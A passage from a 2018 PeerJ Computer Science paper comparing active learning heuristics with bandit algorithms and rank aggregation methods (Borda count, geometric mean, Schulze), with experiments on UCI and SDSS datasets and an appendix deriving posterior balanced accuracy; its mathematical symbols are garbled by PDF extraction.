aggregate preferences of a group of people to determine, for example, the winner in an election Algorithm 6 EXP3++ algorithm. Notations: ℛ is the set of R heuristics, t is the current time step, b is a parameter used to weight the heuristics for selection, ξi and εi are used to compute the loss Li, ρ is the distribution from which a heuristic is sampled, and w is the reward received. function SELECT() b ¼ 1 2 ffiffiffiffiffiffiffiffi ln R tR r for i ∈ {1, 2, ..., R} do ji ¼ 18 InðtÞ2 tminð1; 1 t ðLi �minðLÞÞÞ2 εi ¼ min � 1 2R ; b; ji � ri ¼ e�b�LiP j e �b�Lj end r� draw a sample from ℛ with probability distribution ρ. function UPDATE (w) t t þ1 T�ðtÞ T�ðt �1Þþ1 L� L� þð1�wÞ ð1�Pj εjÞW� þ ε� Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 11/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ (List, 2013). It has the nice property that everyone (or in our context, every active learning heuristic) has a voice. For each heuristic, we assign a score to every candidate with the score function s(x, h) like before. We are neither interested in the actual raw scores nor the candidate with the highest score. Instead, we only need a ranking of the candidates, which is achieved by a function kðs;UÞ that provides a ranking of the unlabeled examples according to their scores. For example, k could assign the candidate with the highest score a rank of 1, the next best candidate a rank of 2, and so on. An aggregation function c will then combine all the rankings into a combined ranking, c : sðJUÞR ! sðJUÞ (23) where sðJUÞ is a permutation over the index set of the unlabeled pool U and R is the number of heuristics. From these we can pick the highest-ranked candidate to annotate. See Table 2 for an example. The main difference between this approach and the bandit algorithms is that we do not consider the reward history when combining the rankings. Here each heuristic is assumed to always have an equal weight. A possible extension, which is not considered in this paper, is to use the past performance to re-weight the heuristics before aggregating at each step. Figure 2 and Algorithm 7 provide an overview of how social choice theory is used in pool-based active learning. The central question in social choice theory is how we can come up with a good preference aggregation rule. We shall examine three aggregation rules: Borda count, the geometric mean, and the Schulze method. In the simplest approach, Borda count, we assign an integer point to each candidate. The lowest-ranked candidate receives a point of 1, and each candidate receives one more point than the candidate below. To aggregate, we simply add up all the points each Table 2 An example of how to convert raw scores into a ranking. Score s(x; h) 0.1 0.9 0.3 0.8 Rank k(s, U) 4 1 3 2 Train with classifier h Assign scores with s1,.., sR Convert to rankings with k Aggregate rankings with cSelect highest ranked candidate Add to training pool Label candidate LT U p(Y) σ1(JU ), ..., σR(JU ) σ(JU )x∗(x∗, y∗) R Figure 2 Active learning pipeline with rank aggregation methods. Unlike the bandit pipeline, there is only one cycle in which we aggregate information from all heuristics. Additional notation: sðJUÞ is a permutation (i.e., rank) on the index set of the unlabeled data. Full-size DOI: 10.7717/peerj-cs.157/fig-2 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 12/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-2 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ candidate receives from every heuristic. The candidate with the most points is declared the winner and is to be labeled next. We can think of Borda count, then, as ranking the candidate according to the arithmetic mean. An alternative approach is to use the geometric mean, where instead of adding up the points, we multiply them. Bedö & Ong (2016) showed that the geometric mean maximizes the Spearman correlation between the ranks. Note that this method requires the ranks to be scaled so that they lie strictly between 0 and 1. This can be achieved by simply dividing the ranks by (U + 1), where U is the number of candidates. The third approach we consider is the Schulze method (Schulze, 2011). Out of the three methods considered, this is the only one that fulfills the Condorcet criterion, i.e., the winner chosen by the algorithm is also the winner when compared individually with each of the other candidates. However, the Schulze method is more computationally intensive since it requires examining all pairs of candidates. First we compute the number of heuristics that prefer candidate xi to candidate xj, for all possible pairs (xi, xj). Let us call this d(xi, xj). Let us also define a path from candidate xi to xj as the sequence of candidates, {xi, x1, x2, ..., xj}, that starts with xi and ends with xj, where, as we move along the path, the number of heuristics that prefer the current candidate over the next candidate must be strictly decreasing. Intuitively, the path is the rank of a subset of candidates, where xi is the highest-ranked candidate and xj is at the lowest-ranked. Associated with each path is a strength p, which is the minimum of d(xi, xj) for all consecutive xi and xj along the path. The core part of the algorithm involves finding the path of the maximal strength from each candidate to every other. Let us call p(xi, xj) the strength of strongest path between xi and xj. Candidate xi is a potential winner if pðxi; xjÞ pðxj; xiÞ for all other xj. This problem has a similar flavor to the problem of finding the shortest path. In fact, the implementation uses a variant of the Floyd–Warshall algorithm to find the strongest path. This is the most efficient implementation that we know of, taking cubic time in the number of candidates. Algorithm 7 Pool-based active learning with social choice theory. Input: unlabeled set U, labeled training set ℒT, classifier h, set of active learning suggestions R, ranking function k, and rank aggregator c. repeat: for r ∈ R do Rank all the candidates in U with k. end Aggregate all the rankings into one ranking using the aggregator c. Select the highest-ranked candidate x� from U. Ask the expert to label x�. Call the label y�. Add the newly labeled example to the training set: LT LT [fðx�; y�Þg. Remove the newly labeled example from the unlabeled set: U Unfx�g. Retrain the classifier h(x) using ℒT. until we have enough training examples. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 13/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ We end this section with a small illustration of how the three aggregation algorithms work in Table 3. EXPERIMENTAL PROTOCOL We use 11 classification datasets taken from the UCI Machine Learning Repository (https://archive.ics.uci.edu/ml/) (Lichman, 2013), with a large multiclass classification dataset which we extracted from the SDSS project (DOI 10.5281/zenodo.58500) (Alam et al., 2015). The code for the experiments can be found on our GitHub repository (https://github.com/chengsoonong/mclass-sky). Table 4 shows the size and the number of classes in each dataset, along with the proportion of the samples belonging to the majority class and the maximum achievable performance using logistic regression. These datasets were chosen such that we have an equal number of binary and multiclass datasets, and a mixture of small and large datasets. For each dataset, we use Scikit-learn (Pedregosa et al., 2011) to train a logistic regression model using a 10-fold stratified shuffled cross-validation. Here “stratified” means that the proportion of the classes remains constant in each split. We standardize all features to have zero mean and unit variance. Although all examples have already been labeled, Table 3 An example of how social choice theory algorithms rank candidates by aggregating three heuristics: r1, r2, and r3. There are four candidates in the unlabeled pool: A, B, C, and D. (a) An example of how the three heuristics rank four candidates A, B, C, and D. For instance, heuristic r1 considers B to be the highest rank candidate, followed by A, C, and D. Heuristic Ranking r1 B A C D r2 A C B D r3 B D C A (b) Aggregated ranking with Borda count and geometric mean. The scores are determined by the relative ranking in each heuristic. For example, A is ranked second by r1, first by r1, and last by r3, thus giving us a score of 3, 4, and 1, respectively. In both methods, candidate B receives the highest aggregated score. Candidate Borda count Geometric mean A 3 + 4 + 1 = 8 3 � 4 � 1 = 12 B 4 + 2 + 4 = 10 4 � 2 � 4 = 32 C 2 + 3 + 2 = 7 2 � 3 � 2 = 12 D 1 + 1 + 3 = 5 1 � 1 � 3 = 3 (c) Aggregated ranking with the Schulze method. The table shows the strongest path strength p(xi, xj) between all pairs of candidates. For example, p(B, D) = 3 because the path B / D is the strongest path from B to D, where three heuristics prefer B over D. Candidate B is the winner since p(B, A) > p(A, B), p(B, C) > p(C, B), and p(B, D) > p(D, B). From/To A B C D A – 1 2 2 B 2 – 2 3 C 1 1 – 2 D 2 0 1 – Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 14/34 https://archive.ics.uci.edu/ml/ https://dx.doi.org/10.5281/zenodo.58500 https://github.com/chengsoonong/mclass-sky http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ we simulate the active learning task by assuming that certain examples do not have any labels. For each fold, the unlabeled pool size is 70% of data up to a maximum of 10,000 examples, and the test pool consists of the remaining examples up to a maximum of 20,000. We assume all test examples are labeled. We initialize the classifier by labeling 10 random instances and using them as the initial training set. The heuristics are fast enough such that we can assign a score to every unlabeled instance at every time step. We use logistic regression with a Gaussian kernel approximation and an L2 regularizer. In the binary case, the loss function is L ¼ 1 2 θTθþC Xn i¼1 ln 1þ expð�yiðθTf ðxiÞÞÞ � (24) where xi is the feature vector of the ith example, yi ∈ {0, 1} is the label of xi, and n is the training size. The term 1 2 θTθ is the regularization term to ensure that the weight vector θ is not too large, and C is a regularization hyperparameter in [10-6, 106] which we find using grid search. To speed up the training time while using the Gaussian kernel, we approximate the feature map of the kernel with Random Kitchen Sinks (Rahimi & Recht, 2008), transforming the raw features xi into a fixed 100-dimensional feature vector f (xi). In the multiclass case, we use the One-vs-Rest strategy, where for every class we build a binary classifier that determines whether a particular example belongs to that class or not. For the QBB algorithms, we train a committee of seven classifiers, where each member is given a sample of maximum 100 examples that have already been labeled. For the bandit algorithms, we use the increase in the MPBA on the test set as the reward. The MPBA can be thought of as the expected value of the average recall, where Table 4 Overview of datasets. Dataset Size No. of classes No. of features Majority class (%) Max performance (MPBA) (%) Glass 214 6 10 33 65 Ionosphere 351 2 34 64 89 Iris 150 3 4 33 90 Magic 19,020 2 11 65 84 Miniboone 129,596 2 50 72 88 Pageblock 5,473 5 10 90 79 Pima 733 2 8 66 71 SDSS 2,801,002 3 11 61 90 Sonar 208 2 60 53 78 Vehicle 846 4 18 26 81 Wine 178 3 13 40 94 WPBC 194 2 34 76 58 Note: The following datasets are from the UCI Machine Learning Repository: glass, ionosphere, iris, magic, miniboone, pageblock, pima, sonar, vehicle, wine, and wpbc. In particular, the vehicle dataset comes from the Turing Institute, Glasgow, Scotland. The sdss dataset was extracted from Data Release 12 of SDSS-III. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 15/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ we treat the recall as a random variable that follows a Beta distribution. Compared to the raw accuracy score, this metric takes into account class imbalance. This is because we first calculate the recall in each class and then take the average, thus giving each class an equal weight. Refer to Appendix A for the derivation of the MPBA, which extends Brodersen et al. (2010)’s formula from the binary to the multiclass setting. In total, we test 17 query strategies. This includes passive learning, eight active learning heuristics, five bandit algorithms, and three aggregation methods. The bandit algorithms include the four described in “Combining Suggestions with Bandit Theory” and a baseline called EXPLORE which simply selects a random heuristic at each time step. In other words, we ignore the rewards and explore 100% of the time. For all bandit and rank aggregation methods, we take advice from six representative experts: PASSIVE, CONFIDENCE, MARGIN, ENTROPY, QBB-MARGIN, and QBB-KL. We have not explored how adding the heuristics with information density weighting to the bandits would impact the performance. See Table 5 for a list of abbreviations associated with the methods. Given that there are 12 datasets, each with 17 learning curves, we need a measure that can summarize in one number how well a particular heuristic or policy does. Building on Baram, El-Yaniv & Luz (2004)’s deficiency measure, we define the strength of an active learner or a combiner relative to passive learning as Strengthðh; mÞ¼ 1� Pn t¼1 mðmaxÞ�mðh; tÞð ÞPn t¼1 mðmaxÞ�mðpassive; tÞð Þ (25) where m is a chosen metric (e.g., accuracy rate, MPBA), m(max) is the best possible performance 1 , and m(h, t) is the performance achieved using the first t examples selected by Table 5 Summary of active learning heuristics and combiners used in the experiments. Abbreviation Type Description PASSIVE Heuristic Passive learning CONFIDENCE Heuristic Least confidence heuristic W-CONFIDENCE Heuristic Least confidence heuristic with information density weighting MARGIN Heuristic Smallest margin heuristic W-MARGIN Heuristic Smallest margin heuristic with information density weighting ENTROPY Heuristic Highest entropy heuristic W-ENTROPY Heuristic Highest entropy heuristic with information density weighting QBB-MARGIN Heuristic Smallest QBB margin heuristic QBB-KL Heuristic Largest QBB KL-divergence heuristic EXPLORE Bandit Bandit algorithm with 100% exploration THOMPSON Bandit Thompson sampling OCUCB Bandit Optimally confidence UCB algorithm KLUCB Bandit kl-UCB algorithm EXP3++ Bandit EXP3++ algorithm BORDA Aggregation Aggregation with Borda count GEOMETRIC Aggregation Aggregation with the geometric mean SCHULZE Aggregation Aggregation with the Schulze method 1 The best possible performance in each trial is obtained by the higher of: (1) the performance achieved by using all the labeled examples in the training set; and (2) the maximum value of the learning curves of all the methods. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 16/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ heuristic h. We can think of the summation as the area between the best possible performance line and the learning curve of h. The better the heuristic is, the faster it would approach this maximum line, and thus the smaller the area. Finally, so that we can compare the performance across datasets, we normalize the measure with the area obtained from using just passive learning. Refer to Fig. 3 for a visualization of the strength measure. We evaluate the algorithm performance with two metrics: the accuracy score and the MPBA. The accuracy score is the percentage of instances in the test set where the predicted label matches the true label. If a dataset has a dominant class, then the accuracy score of instances within that class will also dominate the overall accuracy score. The MPBA, on the other hand, puts an equal weight on each class and thus favors algorithms that can predict the label of all classes equally well. The heuristics with information density weighting and Thompson sampling have a few additional hyperparameters. To investigate the effect of these hyperparameters, we pick one binary dataset (glass) and one multiclass dataset (ionosphere) to investigate. Both of these are small enough to allow us to iterate through many hyperparameter values quickly. With W-CONFIDENCE, W-MARGIN, and W-ENTROPY, we set g in the Gaussian kernel to be the inverse of the 95th percentile of all pairwise distances. This appears to work well, as shown in Fig. 4. For THOMPSON, the prior values for m, s 2 and the value of t 2 seem to have little effect on the final performance (see Fig. 5). We set the initial m to 0.5, the initial s 2 to 0.02, and t 2 to 0.02. RESULTS Figures 6 and 7 show the strengths of all methods that we consider, while Figs. 8 and 9 provide selected learning curves. Plots for the six small datasets with fewer than 500 Figure 3 An illustration of the MPBA strength measure. It is proportional to the shaded area between the (red) passive learning curve and the (blue) active learning curve. The bigger the area is, the more the active learner outperforms the passive learner. The top dotted line indicates the maximum performance achieved. Full-size DOI: 10.7717/peerj-cs.157/fig-3 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 17/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-3 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ examples (glass, ionosphere, iris, sonar, wine, and wpbc) are shown in Figs. 6 and 8. Plots for the two medium-sized datasets (pima and vehicle) and the four large datasets (magic, miniboone, pageblocks, and sdss) are shown in Figs. 7 and 9. Each figure contains two subfigures, one reporting the raw accuracy score, while the other showing the MPBA score. Active learning methods generally beat passive learning in four of the six small datasets— glass, ionosphere, iris, and wine. This can be seen by the fact that the boxplots are mostly above the zero line in Fig. 6. For sonar and wpbc, the results are mixed—active learning has little to no effect here. The wpbc dataset is particularly noisy—our classifier cannot achieve an MPBA score greater than 60% (see Fig. 8). Thus it is not surprising that active learning does not perform well here since there is not much to learn to begin with. The advantage of active learning becomes more apparent with the larger datasets like magic, miniboone, pageblocks, and sdss. Here there is a visible gap between the Figure 4 Effect of g on W-CONFIDENCE and W-MARGIN using the glass and ionosphere datasets. We examine six different values for g: the 50th, 60th, 70th, 90th, 95th, and 99th percentile of the pairwise L1-distance between the data points. For the glass dataset (A), changing value of g has minimal effect on the results, while for the ionosphere dataset (B), using the 90th percentile and above seems to work well. Full-size DOI: 10.7717/peerj-cs.157/fig-4 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 18/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-4 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ passive learning curve and the active learning curve for most methods. For instance, using a simple heuristic such as CONFIDENCE in the pageblocks dataset results in an average MPBA score of 74% after 1,000 examples, while passive learning can only achieves 67% (see Fig. 9F). Out of the eight active learning heuristics tested, the heuristics with the information density weighting (W-CONFIDENCE, W-MARGIN, and W-ENTROPY) generally perform worse than the ones without the weighting. QBB-KL performs the best in pageblocks while it can barely beat passive learning in other datasets. The remaining heuristics—CONFIDENCE, MARGIN, ENTROPY, and QBB-MARGIN—perform equally well in all datasets. We find no difference in performance between the bandit algorithms and the rank aggregation methods. Combining active learners does not seem to hurt the performance, even if we include a poorly performing heuristic such as QBB-KL. For bandit algorithms, it is interesting to note that THOMPSON favors certain heuristics a lot more than others, while the behavior of EXP3++, OCUCB, and KLUCB is almost Figure 5 Effect of the initial values of the parameters in THOMPSON. We test 16 combinations of m, s 2 , and t 2 on the glass (A) and ionosphere (B) dataset. Varying these values does not seem to affect the final performance. Full-size DOI: 10.7717/peerj-cs.157/fig-5 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 19/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-5 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Figure 6 Boxplots of the accuracy and MPBA strength of the 16 active learning strategies, relative to passive learning, using the small datasets (glass, ionosphere, iris, sonar, wine, and wpbc). The more positive the strength is, the better the heuristic/combiner is. Gray boxes represent individual heuristics; blue boxes represent bandit algorithms, and red boxes are for rank aggregation methods. A strategy that is above the zero line is better than passive learning. Each boxplot contains 10 trials. The accuracy score (A, C, E, G, I, and K) is a simple metric that simply counts up the number of correct predictions. The MPBA score (B, D, F, H, J, and L), being the weighted average of the recall and precision, gives an equal representation to each class. The boxes represent the quartiles and the whiskers extend to 1.5 times of the interquartile range. Full-size DOI: 10.7717/peerj-cs.157/fig-6 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 20/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-6 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Figure 7 Boxplots of the accuracy and MPBA strength of the 16 active learning strategies, relative to passive learning, using medium to the large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). The more positive the strength is, the better the heuristic/combiner is. Gray boxes represent individual heuristics; blue boxes represent bandit algorithms, and red boxes are for rank aggregation methods. A strategy that is above the zero line is better than passive learning. Each boxplot contains 10 trials. The accuracy score (A, C, E, G, I, and K) is a simple metric that simply counts up the number of correct predictions. The MPBA score (B, D, F, H, J, and L), being the weighted average of the recall and precision, gives an equal representation to each class. The boxes represent the quartiles and the whiskers extend to 1.5 times of the interquartile range. Full-size DOI: 10.7717/peerj-cs.157/fig-7 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 21/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-7 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Figure 8 Selected accuracy and MPBA learning curves for the small datasets (glass, ionosphere, iris, sonar, wine, and wpbc). As it would get too cluttered to plot 17 learning curves, we only show the accuracy (A, C, E, G, I, and K) and MPBA (B, D, F, H, J, and L) learning curves for PASSIVE, CONFIDENCE, EXP3++, and BORDA. The learning curves are averaged over 10 trials. The dotted horizontal line shows the performance obtained from using the whole training data. Full-size DOI: 10.7717/peerj-cs.157/fig-8 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 22/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-8 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Figure 9 Selected accuracy and MPBA learning curves for the medium to large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). As it would get too cluttered to plot 17 learning curves, we only show the accuracy (A, C, E, G, I, and K) and MPBA (B, D, F, H, J, and K) learning curve for PASSIVE, CONFIDENCE, EXP3++, and BORDA. The learning curves are averaged over 10 trials. The dotted horizontal line shows the performance obtained from using the whole training data. Full-size DOI: 10.7717/peerj-cs.157/fig-9 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 23/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-9 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Figure 10 Selection frequencies of heuristics in THOMPSON and EXP3++, with the large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). The plots show how often each of the heuristics gets selected over time. The selection frequencies are averaged over 10 trials. THOMPSON (A–F) favors certain heuristics more strongly than others. In contrast, EXP3++ (G–L) favors uniform exploration more, sampling each heuristic with roughly equal weights. The plots for OCUCB and KLUCB are not shown here, but they are similar to EXP3++. Full-size DOI: 10.7717/peerj-cs.157/fig-10 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 24/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-10 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Figure 11 The effect of the initial values of the parameters in THOMPSON on the heuristic selection frequencies. We test 16 combinations of m, s 2 , and t 2 on the glass and ionosphere dataset. Which heuristics THOMPSON picks seems to correlate with the heuristic performance. For example, in ionosphere, PASSIVE (the dotted purple line) and QBB-KL (the dashed dark blue line) tend to get picked less often than others. Full-size DOI: 10.7717/peerj-cs.157/fig-11 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 25/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-11 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ indistinguishable from EXPLORE, where we explore 100% of the time (see Fig. 10). Changing the initial values of m, s 2 , and t 2 changes the order of preference slightly, but overall, which heuristics THOMPSON picks seems to correlate with the heuristic performance. For example, as shown in Fig. 11, PASSIVE and QBB-KL tend to get chosen less often than others in the ionosphere dataset. DISCUSSION The experimental results allow us to answer the following questions: 1. Can active learning beat passive learning? Yes, active learning can perform much better than passive learning, especially when the unlabeled pool is large (e.g., sdss, miniboone, pageblock). When the unlabeled pool is small, the effect of active learning becomes less apparent, as there are now fewer candidates to choose from. This can be seen in Fig. 12, where we show that artificially reducing the unlabeled pool results in a reduction in the final performance. At the same time, having a small test set also makes the gap between the active learning curve and the passive learning curve smaller (see Figs. 12C and 12F). This further contributes to the poorer performance on the smaller datasets. In any case, when a dataset is small, we can label everything so active learning is usually not needed. Figure 12 Effect of the pool size on the learning curves. We pick two large datasets—pageblocks and sdss—to investigate how the size of the pool affects the performance. (A) and (D) are the original learning curves from Figs. 9F and 9J (we only show the first 200 examples so that all figures have the same scale). For (B) and (E), we use the same test pool, but the unlabeled pool now only has a maximum of 300 candidates. Finally, for (C) and (F) the combined test pool and training pool have a size of 300. Full-size DOI: 10.7717/peerj-cs.157/fig-12 Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 26/34 http://dx.doi.org/10.7717/peerj-cs.157/fig-12 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ 2. Can active learning degrade performance? Yes, there is no guarantee that active learning will always beat passive learning. For example, W-ENTROPY actually slows down the learning in the many datasets. However, this only happens with certain heuristics, like those using the information density weighting. 3. What is the best single active learning heuristic? All of CONFIDENCE, MARGIN, ENTROPY, and QBB-MARGIN have a similar performance. However CONFIDENCE is perhaps the simplest to compute and thus is a good default choice in practice. 4. What are the challenges in using bandit algorithms? (a) Designing a good reward scheme is difficult. This paper uses the increase in the classifier performance as the reward. However this type of reward is non-stationary (i.e., it gets smaller after each step as learning saturates) and the rewards will thus eventually go to zero. (b) In practice, we do not have a representative test set that can be used to compute the reward. As a workaround, Hsu & Lin (2015) computed the reward on the training set and then used importance weighting to remove any potential bias. For this to work, we need to ensure that every training example and every active learning suggestion have a non-zero probability of being selected in each step. (c) Finally, some bandit algorithms such as Thompson sampling assumes that the reward follows a certain distribution (e.g., Gaussian). However, this assumption is unrealistic. 5. What are the challenges in using rank aggregation algorithms? (a) We need to compute the scores from all heuristics at every time step. This might not be feasible if there are too many heuristics or if we include heuristics that require a large amount of compute power (e.g., variance minimization). (b) The Schulze method uses O(n 2 ) space, where n is the number of candidates. This might lead to memory issues if we need to rank a large number of candidates from the unlabeled pool. (c) Before aggregating the rankings, we throw away the score magnitudes, which could cause a loss of information. (d) Unlike bandit algorithms, all of the rank aggregators always give each heuristic an equal weight. 6. Which method should I use in practice to combine active learners? Since there is no difference in performance between various combiners, we recommend using a simple rank aggregator like Borda count or geometric mean if we do not want to select a heuristic a priori. Rank aggregators do not need a notion of a reward—we simply give all suggestions an equal weight when combining. Thus we neither need to a keep a separate test set, nor do we need to worry about designing a good reward scheme. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 27/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Our investigation has a few limitations. Firstly, we empirically compare algorithms that only work with single-label classification problems. Nowadays, many problems require multi-label learning, in which each example is allowed to be in more than one class. Our methods can be extended to work with multi-label datasets with the following modifications. We first need a multi-label classifier. This can be as simple as a collection of binary classifiers, each of which produces the probability that an example belongs to a particular class. For each class, we can use an active learning heuristic to assign a score to each unlabeled example as before. However now we need to aggregate the scores among the classes. As suggested by Reyes, Morell & Ventura (2018), we can use any aggregation method like Borda count to combine these scores. In effect, the multi-label learning problem adds an extra layer of aggregation into the pipeline. Another limitation of our methods is that our active learning methods are myopic. That is, in each iteration, we only pick one instance to give to a human expert for labeling. In many practical applications like astronomy, batch-mode active learning is preferred, as it is much more cost efficient to obtain multiple labels simultaneously. One naive extension is to simply choose the m highest ranked objects using our current methods. However, it is possible to have two unlabeled objects whose class membership we are currently uncertain about, but because they have very similar feature vectors, labeling only one of them would allow us to predict the label of the other one easily. More sophisticated batch-mode active learning approaches have been proposed to take into account other factors such as the diversity of a batch and the representativeness of each batch example. These approaches include looking at the angles between hyperplanes in support vector machines (Brinker, 2003), using cluster analysis (Xu, Akella & Zhang, 2007), and using an evolutionary algorithm (Reyes & Ventura, 2018). How to aggregate suggestions from these approaches is an interesting problem for future work. CONCLUSION In this paper we compared 16 active learning methods with passive learning. Our three main findings are: active learning is better than passive learning; combining active learners does not in general degrade the performance; and social choice theory provides more practical algorithms than bandit theory since we do not need to design a reward scheme. APPENDIX A: POSTERIOR BALANCED ACCURACY Most real-world datasets are unbalanced. In the SDSS dataset, for example, there are 4.5 times as many galaxies as quasars. The problem of class imbalance is even more severe in the pageblocks dataset, where one class makes up 90% of the data and the remaining four classes only make up 10%. An easy fix is to under sample the dominant class when creating the training and test sets. This, of course, means that the size of these sets are limited by the size of the minority class. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 28/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ When we do not want to alter the underlying class distribution or when larger training and test sets are desired, we need a performance measure that can correct for the class imbalance. Brodersen et al. (2010) show that the posterior balanced accuracy distribution can overcome the bias in the binary case. We now extend this idea to the multi-class setting. Suppose we have k classes. For each class i between 1 and k, there are Ni objects in the universe. Given a classifier, we can predict the label of every object and compare our prediction with the true label. Let Gi be the number of objects in class i that are correctly predicted. Then we define the recall Ai of class i as Ai ¼ Gi Ni (26) The problem is that it is not feasible to get the actual values of Gi and Ni since that would require us to obtain the true label of every object in the universe. Thus we need a method to estimate these quantities when we only have a sample. Initially we have no information about Gi and Ni, so we can assume that each Ai follows a uniform prior distribution between 0 and 1. This is the same as a Beta distribution with shape parameters a = b = 1: Ai � Betað1; 1Þ (27) The probability density function (PDF) of Ai is then fAiðaÞ¼ �ðaþbÞ �ðaÞ�ðbÞ a a�1ð1�aÞb�1 / a1�1ð1�aÞ1�1 (28) where C(a) is the gamma function. After we have trained the classifier, suppose we have a test set containing ni objects in class i. Running the classifier on this test set is the same as conducting k binomial experiments, where, in the ith experiment, the sample size is ni and the probability of success is simply Ai. Let gi be the number of correctly labeled objects belonging to class i in the test set. Then, conditional on the recall rate Ai, gi follows a binomial distribution: ðgi jAiÞ� Binðni; AiÞ (29) The probability mass function of ðgi jAi ¼ aÞ is thus pgi jAiðgiÞ¼ ni gi � � agið1�aÞni�gi / agið1�aÞni�gi (30) In the Bayesian setting, Eq. (28) is the prior and Eq. (30) is the likelihood. To get the posterior PDF, we simply multiply the prior with the likelihood: fAi jgðaÞ/ fAiðaÞ� fgi jAiðgiÞ / a1�1ð1�aÞ1�1 �agið1�aÞni�gi ¼ a1þgi�1ð1�aÞ1þni�gi�1 (31) Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 29/34 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Thus, with respect to the binomial likelihood function, the Beta distribution is conjugate to itself. The posterior recall rate Ai also follows a Beta distribution, now with parameters ðAi jgiÞ� Betað1þ gi; 1þni � giÞ (32) Our goal is to have a balanced accuracy rate, A, that puts an equal weight in each class. One way to achieve this is to take the average of the individual recalls: A ¼ 1 k Xk i¼1 Ai ¼ 1 k AT (33) Here we have defined AT to be the sum of the individual recalls. We call ðA jgÞ the posterior balanced accuracy, where g = (g1, ..., gk). Most of the time, we simply want to calculate its expected value: E½A jg� ¼ 1 k E½AT jg� ¼ 1 k Z a fAT jgðaÞda (34) Let us call this the MPBA. Note that there is no closed form solution for the PDF fAT jgðaÞ. However assuming that AT is a sum of k independent Beta random variables, fAT jgðaÞcan be approximated by numerically convolving k Beta distributions. The independence assumption is reasonable here, since there should be little to no correlation between the individual recall rates. For example, knowing that a classifier is really good at recognizing stars does not tell us much about how well that classifier can recognize galaxies. Having the knowledge of fA|g (a) will allow us to make violin plots, construct confidence intervals and do hypothesis tests. To get an expression for this, let us first rewrite the cumulative distribution function as FA jgðaÞ¼ PðA � a jgÞ ¼ P 1 k AT � a jg � � ¼ PðAT � ka jgÞ ¼ PFAT jgðkaÞ (35) Differentiating (Eq. (35)) with respect to a, we obtain the PDF of (A|g): fA jgðaÞ¼ @ @a FA jgðkaÞ ¼ @ @a ðkaÞ @ @ka FAT jgðkaÞ ¼ k fAT jgðkaÞ (36) A Python implementation for the posterior balanced accuracy can be found on our GitHub repository (https://github.com/chengsoonong/mclass-sky). Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 30/34 https://github.com/chengsoonong/mclass-sky http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding The research was supported by the Data to Decisions Cooperative Research Centre whose activities are funded by the Australian Commonwealth Government’s Cooperative Research Centres Programme. This research was supported by the Australian Research Council Centre of Excellence for All-sky Astrophysics (CAASTRO), through project number CE110001020. The SDSS dataset was extracted from Data Release 12 of SDSS-III. Funding for SDSS-III has been provided by the Alfred P. Sloan Foundation, the Participating Institutions, the National Science Foundation, and the U.S. Department of Energy Office of Science. The SDSS-III web site is http://www.sdss3.org/. SDSS-III is managed by the Astrophysical Research Consortium for the Participating Institutions of the SDSS-III Collaboration including the University of Arizona, the Brazilian Participation Group, Brookhaven National Laboratory, 